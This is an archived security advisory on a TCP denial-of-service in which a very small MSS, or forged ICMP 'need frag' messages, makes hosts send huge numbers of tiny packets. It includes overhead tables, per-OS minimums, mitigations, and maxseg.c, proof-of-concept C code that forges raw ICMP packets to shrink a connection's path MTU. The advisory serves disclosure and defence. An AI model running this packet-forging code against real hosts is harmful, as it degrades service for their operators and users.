TUCoPS :: Unix :: General :: tcpip2.htm

TCP/IP packetstorm
Vulnerability
 TCP/IP
Affected
 most systems
Description
 Darren Reed found the following. On a LAN far far away, a rogue
 packet was heading towards a server, ready to start up a new
 storm ...
 If any of you have tested what happens to the ability of a box to
 perform well when it has a small MTU you will know that setting
 the MTU to (say) 56 on a diskless thing is a VERY VERY bad idea
 when NFS read/write packets are generally 8k in size. Do not try
 it on an NFS thing unless you plan to reboot it, OK? The last time
 Darren did this was when he worked out you could fragment packets
 inside the TCP header, and that lesson was enough for him.
 Following on from this, it occurs to me that the problem with the
 above can possibly be reproduced with TCP. How? That thing
 called "maximum segment size". The problem? Well, the first is
 that there does not appear to be a minimum. The second is that
 it is negotiated by the caller, not the callee. Did we hear someone
 say "oh dear"?
 What's this mean? Well, if we connect to www.microsoft.com and
 set our MSS to 143 (say), they need to send us 11 packets for
 every one they would normally send us (with an MSS of 1436).
 Total output for them is 1876 bytes instead of 1476, an increase
 of about 27%. However, that's not the real problem. Our experience
 is that hosts, especially PCs, have a lot of trouble handling
 *LOTS* of interrupts. To send 2k out via the network, it's no
 longer 2 packets but 20+, a significant increase in the workload.
 A quick table (assuming a 20-byte IP header and a 20-byte TCP
 header, i.e. 40 bytes of headers per packet):
 datalen    mss   packets   total bytes   % increase
    1436   1436         1          1476           0%
    1436   1024         2          1516           3%
    1436    768         2          1516           3%
    1436    512         3          1556           5%
    1436    256         6          1676          14%
    1436    128        12          1916          30%
    1436     64        23          2356          60%
    1436     32        45          3236         119%
    1436     28        52          3516         138%   (MTU = 68)
    1436     16        90          5036         241%
    1436      8       180          8636         485%
    1436      1      1436         58876        3889%
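
 The rows above follow from simple arithmetic, sketched below in C.
 This is only an illustration and not part of Darren's program: the
 names segments_needed, wire_bytes, overhead_percent and print_row
 are made up here, and the sketch assumes 40 bytes of headers per
 packet with no IP or TCP options.

```c
#include <stdio.h>

/* Assumption: 20-byte IP header + 20-byte TCP header, no options. */
#define HDR_BYTES 40UL

/* Packets needed to carry datalen bytes when each holds at most mss. */
unsigned long segments_needed(unsigned long datalen, unsigned long mss)
{
	if (mss == 0)
		return 0;	/* nothing can be sent with an MSS of 0 */
	return (datalen + mss - 1) / mss;	/* ceiling division */
}

/* Bytes on the wire: the payload plus one set of headers per packet. */
unsigned long wire_bytes(unsigned long datalen, unsigned long mss)
{
	return datalen + segments_needed(datalen, mss) * HDR_BYTES;
}

/*
 * Percentage increase over sending everything in a single packet,
 * rounded to the nearest whole percent.
 */
unsigned long overhead_percent(unsigned long datalen, unsigned long mss)
{
	unsigned long base = datalen + HDR_BYTES;
	unsigned long total = wire_bytes(datalen, mss);

	if (total <= base)
		return 0;
	return ((total - base) * 100 + base / 2) / base;
}

/* Print one table row for the given payload size and MSS. */
void print_row(unsigned long datalen, unsigned long mss)
{
	printf("%7lu %6lu %9lu %13lu %11lu%%\n", datalen, mss,
	    segments_needed(datalen, mss), wire_bytes(datalen, mss),
	    overhead_percent(datalen, mss));
}
```

 For instance, print_row(1436, 128) works out to 12 packets and 1916
 bytes on the wire, and an MSS of 143 gives the 11 packets and 1876
 bytes quoted for the www.microsoft.com example.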
 For Solaris, you can enforce a more sane minimum MSS than the
 install default (1) with ndd:
 ndd -set /dev/tcp tcp_mss_min 128
 HP-UX 11.* is in the same basket as Solaris.
 *BSD have varying minimums well above 1 - NetBSD at 32, FreeBSD
 at 64. (OpenBSD's comment on this says 32 but the code says 64).
 Linux 2.4 is at 88.
 We can't see anything in the registry or MSDN which says what it
 is for Windows. By experimentation, Win2000 appears to be 88 and
 NT 4 appears to be 1.
 Nothing else besides Solaris seems to have anything close to a
 reasonable manner in which to tune the minimum value. What's most
 surprising is that there does not appear to be a documented
 minimum, just as there is no "minimum MTU" size for IP. If there
 is, please correct us.
 About the only bonus to this is that there does not appear to be
 an easy way to affect the MSS sent in the initial SYN packet.
 Oh, so how's this a potential denial of service attack? Generally
 network efficiency comes through sending lots of large packets...
 but don't tell ATM folks that, of course. Does it work? *shrug*
 It is not easy to test. The only testing Darren could do (with
 NetBSD) was to use the TCP_MAXSEG setsockopt, BUT this only affects
 the sending MSS (now what use is that?). Still, in testing, changing
 it from the default 1460 to 1 caused the number of packets needed
 to write 1436 bytes of data to the discard port to go from 9 to
 2260. To send 100 * 1436 bytes from the NetBSD box to Solaris8 took
 60 seconds (MSS of 1) vs ~1 second with an MSS of 1460. Of even more
 significance, one connection like this made almost no difference
 after the first run, but running a second saw kernel CPU jump to
 30% on an SS20/712 (we suspect there is some serious TCP tuning
 happening dynamically). The sending host was likewise afflicted
 with a significant CPU usage penalty if more than one was running.
 There
 were some very surprising things happening too - with just one
 session active, ~170-200pps were seen with netstat on Solaris,
 but with the second, it was between 1750 and 1850pps. Can you
 say "ACK storm"? Oh, and for fun you can enable TCP timestamping
 just to make those headers bigger and run the system a bit harder
 whilst processing packets!
 Darren did not investigate the impact of ICMP PMTU discovery, but
 from his reading of at least the BSD source code, the MTU for the
 route will be ignored if it is less than the default MSS when
 sending out the TCP SYN with the MSS option. That aside, it will
 still impact current connections and would appear to be a way to
 force the _current_ MSS below that set at connect time. On BSD,
 it will not accept PMTU updates if the MTU is less than 296, on
 Solaris8 and Linux 2.4 it just needs to be above 68 (hmmm, allows
 you to get an effective MSS of less than 88).
 /*
 * (C)Copyright 2001 Darren Reed.
 *
 * maxseg.c
 */
 #include <sys/types.h>
 #include <sys/param.h>
 #include <sys/socket.h>
 #if BSD >= 199306
 #include <sys/sysctl.h>
 #endif
 
 #include <netinet/in.h>
 #include <netinet/in_systm.h>
 #include <netinet/ip.h>
 #include <netinet/ip_icmp.h>
 #include <netinet/ip_var.h>
 #include <netinet/tcp.h>
 #include <netinet/tcp_timer.h>
 #include <netinet/tcp_var.h>
 
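 #include <sys/time.h>
 #include <arpa/inet.h>

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <time.h>
 #include <fcntl.h>
 #include <errno.h>
 #include <err.h>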
 
 void prepare_icmp(struct sockaddr_in *);
 void primedefaultmss(int, int);
 u_short in_cksum(u_short *, int);
 int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *);
 
 
 #define	NEW_MSS	512
 #define	NEW_MTU	1500
 static int start_mtu = NEW_MTU;
 
 void primedefaultmss(int fd, int mss)
 {
 #ifdef __NetBSD__
	 static int defaultmss = 0;
	 int mib[4], msso, mssn;
	 size_t olen;
 
	 if (mss == 0)
		 mss = defaultmss;
	 mssn = mss;
	 olen = sizeof(msso);
 
	 mib[0] = CTL_NET;
	 mib[1] = AF_INET;
	 mib[2] = IPPROTO_TCP;
	 mib[3] = TCPCTL_MSSDFLT;
	 if (sysctl(mib, 4, &msso, &olen, NULL, 0))
		 err(1, "sysctl");
	 if (defaultmss == 0)
		 defaultmss = msso;
 
	 if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn)))
		 err(1, "sysctl");
 
	 if (sysctl(mib, 4, &mssn, &olen, NULL, 0))
		 err(1, "sysctl");
 
	 printf("Default MSS: old %d new %d\n", msso, mssn);
 #endif
 
 #if HACKED_KERNEL
	 int op;		/* was declared as "opt" but used as "op" */

	 if (mss)
		 op = mss;
	 else
		 op = 512;
	 if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, sizeof(op)))
		 err(1, "setsockopt");
 #endif
 }
 
 
 int
 main(int argc, char *argv[])
 {
	 struct sockaddr_in me, them;
	 int fd, op, mss;
	 socklen_t olen;		/* length argument for getsockopt/getsockname */
	 ssize_t n;		/* return value of read() */
	 char prebuf[16374];
	 time_t now1, now2;
	 struct timeval tv;

	 if (argc < 3)
		 errx(1, "usage: %s address port", argv[0]);

	 mss = NEW_MSS;

	 primedefaultmss(-1, mss);

	 fd = socket(AF_INET, SOCK_STREAM, 0);
	 if (fd == -1)
		 err(1, "socket");

	 memset(&them, 0, sizeof(them));
	 them.sin_family = AF_INET;
	 them.sin_port = htons(atoi(argv[2]));	/* host to network order */
	 them.sin_addr.s_addr = inet_addr(argv[1]);

	 primedefaultmss(fd, mss);

	 op = fcntl(fd, F_GETFL, 0);
	 if (op != -1) {
		 op |= O_NONBLOCK;
		 fcntl(fd, F_SETFL, op);
	 }

	 /* TCP_NODELAY lives at the IPPROTO_TCP level, not SOL_SOCKET */
	 op = 1;
	 (void) setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &op, sizeof(op));

	 if (connect(fd, (struct sockaddr *)&them, sizeof(them)) &&
	     (errno != EINPROGRESS))
		 err(1, "connect");

	 olen = sizeof(op);
	 if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen))
		 printf("Remote mss %d\n", op);
	 else
		 err(1, "getsockopt");

 #if HACKED_KERNEL
	 olen = sizeof(op);
	 if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen))
		 printf("Our mss %d\n", op);
	 else
		 err(1, "getsockopt(+1)");
 #endif

	 olen = sizeof(me);
	 if (getsockname(fd, (struct sockaddr *)&me, &olen))
		 err(1, "getsockname");

	 (void) read(fd, prebuf, sizeof(prebuf));

	 /* send two forged "need frag" ICMPs, reading after each one */
	 now1 = time(NULL);
	 for (op = 2; op; op--) {
		 icmp_unreach(&me, &them);
		 n = read(fd, prebuf, sizeof(prebuf));
		 if (n == -1) {
			 if (errno == ENOBUFS || errno == EAGAIN ||
			     errno == EWOULDBLOCK) {
				 /* nothing to read yet: sleep 10ms and go on */
				 tv.tv_sec = 0;
				 tv.tv_usec = 10000;
				 select(3, NULL, NULL, NULL, &tv);
				 continue;
			 }
			 warn("read");
			 break;
		 }
	 }
	 now2 = time(NULL);
	 printf("Elapsed time %ld\n", (long)(now2 - now1));

	 primedefaultmss(fd, 0);
	 close(fd);
	 return 0;
 }
 
 
 /*
 * in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying
 */
 static char icmpbuf[256];
 static int icmpsock = -1;
 static struct sockaddr_in destsock;
 
 void
 prepare_icmp(struct sockaddr_in *dst)
 {
	 struct tcphdr *tcp;
	 struct icmp *icmp;
 
	 icmp = (struct icmp *)icmpbuf;
 
	 if (icmpsock == -1) {
 
		 memset((char *)&destsock, 0, sizeof(destsock));
		 destsock.sin_family = AF_INET;
		 destsock.sin_addr = dst->sin_addr;
 
		 srand(getpid());
 
		 icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
		 if (icmpsock == -1)
			 err(1, "socket");
 
		 /* the following messy stuff from Adam Glass (icmpsquish.c) */
		 memset(icmp, 0, sizeof(struct icmp) + 8);
		 icmp->icmp_type = ICMP_UNREACH;
		 icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
		 icmp->icmp_pmvoid = 0;
 
		 icmp->icmp_ip.ip_v = IPVERSION;
		 icmp->icmp_ip.ip_hl = 5;
		 icmp->icmp_ip.ip_len = htons(NEW_MSS);
		 icmp->icmp_ip.ip_p = IPPROTO_TCP;
		 icmp->icmp_ip.ip_off = htons(IP_DF);
		 icmp->icmp_ip.ip_ttl = 11 + (rand() % 50);
		 icmp->icmp_ip.ip_id = rand() & 0xffff;
 
		 icmp->icmp_ip.ip_src = dst->sin_addr;
 
		 tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
		 tcp->th_sport = dst->sin_port;
	 }
	 icmp->icmp_nextmtu = htons(start_mtu);
	 icmp->icmp_cksum = 0;
 }
 
 
 u_short
 in_cksum(u_short *addr, int len)
 {
	 register int nleft = len;
	 register u_short *w = addr;
	 register int sum = 0;
	 u_short answer = 0;
 
	 /*
	 * Our algorithm is simple, using a 32 bit accumulator (sum),
	 * we add sequential 16 bit words to it, and at the end, fold
	 * back all the carry bits from the top 16 bits into the lower
	 * 16 bits.
	 */
	 while (nleft > 1) {
		 sum += *w++;
		 nleft -= 2;
	 }

	 /* mop up an odd byte, if necessary */
	 if (nleft == 1) {
		 *(u_char *)(&answer) = *(u_char *)w;
		 sum += answer;
	 }

	 /*
	 * add back carry outs from top 16 bits to low 16 bits
	 */
	 sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
	 sum += (sum >> 16); /* add carry */
	 answer = ~sum; /* truncate to 16 bits */
	 return (answer);
 }
 
 int icmp_unreach(struct sockaddr_in *src, struct sockaddr_in *dst)
 {
	 struct tcphdr *tcp;
	 struct icmp *icmp;
	 int i;
	 u_short sum;
 
	 icmp = (struct icmp *)icmpbuf;
 
	 prepare_icmp(dst);
 
	 icmp->icmp_ip.ip_dst = src->sin_addr;
 
	 /* zero the old checksum first, or the second call sums over it */
	 icmp->icmp_ip.ip_sum = 0;
	 sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip));
	 icmp->icmp_ip.ip_sum = sum;
 
	 tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
	 tcp->th_dport = src->sin_port;
 
	 sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8);
	 icmp->icmp_cksum = sum;
	 start_mtu /= 2;
	 if (start_mtu < 69)
		 start_mtu = 69;
 
	 i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0,
		 (struct sockaddr *)&destsock, sizeof(destsock));
	 if (i == -1 && errno != ENOBUFS && errno != EAGAIN &&
	 errno != EWOULDBLOCK)
		 err(1, "sendto");
	 return(0);
 }
 Some people do not understand the difference between the TCP
 MSS and IP's MTU. Either that or both you and David LeBlanc are
 grasping at straws in order to make Windows NT look better.
 MTU and Path MTU (PMTU) discovery are not the same as TCP's MSS
 but they can and do impact it.
 Darren managed to get NT4.0 (workstation) to accept a TCP MSS of 1
 (sent lots of data packets out that had 1 byte of data) and he
 got Win2000 to accept an MTU of 69 (effective MSS of 17 after TCP
 options) through PMTU discovery. Now, if 20+68 is the reason why
 88 is the minimum MSS Win2000 will accept then someone doesn't
 understand what the word "MTU" means, because it refers to the
 TOTAL IP datagram length, not the data part.
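
 The relationship between an MTU and the MSS it leaves room for is
 just a subtraction. A minimal sketch in C, assuming a 20-byte IP
 header, a 20-byte TCP header and (this is our guess at where the
 17 comes from) a 12-byte TCP timestamp option; effective_mss is a
 name invented for this illustration:

```c
#define IP_HDR_LEN	20	/* IPv4 header without options */
#define TCP_HDR_LEN	20	/* TCP header without options */
#define TCP_TS_OPT_LEN	12	/* timestamp option, padded to 12 bytes */

/*
 * Data bytes that fit in one packet of size mtu once the IP header,
 * the TCP header and tcp_opt_len bytes of TCP options are subtracted.
 * Returns 0 if the headers alone do not fit.
 */
int effective_mss(int mtu, int tcp_opt_len)
{
	int mss = mtu - IP_HDR_LEN - TCP_HDR_LEN - tcp_opt_len;

	return mss > 0 ? mss : 0;
}
```

 Under these assumptions effective_mss(69, TCP_TS_OPT_LEN) is 17,
 and effective_mss(68, 0) is 28, the row marked (MTU = 68) in the
 table. Going the other way, an MSS of 88 corresponds to an MTU of
 128, not 68.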
 Using the C program above, one is able to get Win2000 to create
 an MTU-specific path to a local box where the MTU was 69. That's
 well under any number over 500 (depending on how you choose to
 see the value).
 Path MTU discovery has absolutely no interaction with the TCP MSS
 option itself, except that one would expect a cached path MTU for
 a host, if one already exists, to be used when initiating or
 accepting a new TCP connection to it.
Solution
 Quite clearly the host operating system needs to set a much more
 sane minimum MSS than 1. Given there is no minimum MTU for IP -
 well, maybe "68" - it's hard to derive what it should be.
 Anything below 40 should just be banned (that's the point at which
 you're transmitting 50% data, 50% headers). Most of the defaults,
 above, are chosen because they fit in well with the system's internal
 network buffering (some use a default MSS of 512 rather than
 536 for similar reasons). But above that, what do you choose? 80
 for a 33/67 split, 120 for 25/75, or something higher still?
 Whatever the choice and
 however it is calculated, it is not enough to just enforce it
 when the MSS option is received. It also needs to be enforced
 when the MTU parameter is checked in ICMP "need frag" packets.
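
 As a rough sketch of what "enforce it in both places" could look
 like, the C fragment below applies one floor to an MSS taken from
 the SYN option and to an MSS derived from an ICMP "need frag" MTU.
 None of this is taken from a real TCP stack: MSS_FLOOR (128 is
 simply borrowed from the ndd example), clamp_mss,
 mss_from_syn_option, mss_from_pmtu and header_share_percent are
 all hypothetical names, and 40 bytes of IP plus TCP headers are
 assumed.

```c
#define HDR_LEN		40	/* assumed: 20-byte IP + 20-byte TCP header */
#define MSS_FLOOR	128	/* hypothetical policy value */

/* Never let an MSS drop below the floor. */
int clamp_mss(int mss, int floor)
{
	return mss < floor ? floor : mss;
}

/* Case 1: the MSS option carried in a received SYN. */
int mss_from_syn_option(int advertised_mss, int floor)
{
	return clamp_mss(advertised_mss, floor);
}

/* Case 2: the next-hop MTU carried in an ICMP "need frag" message. */
int mss_from_pmtu(int next_hop_mtu, int tcp_opt_len, int floor)
{
	return clamp_mss(next_hop_mtu - HDR_LEN - tcp_opt_len, floor);
}

/* Share of each full-sized packet taken up by headers, in percent. */
int header_share_percent(int mss)
{
	if (mss <= 0)
		return 100;
	return (HDR_LEN * 100) / (mss + HDR_LEN);
}
```

 With a floor of 128, an advertised MSS of 1 and a forged MTU of 69
 both end up at 128. What a stack should do when the path really is
 narrower than the floor (ignore the ICMP, or stop setting DF) is a
 separate decision that this sketch leaves open.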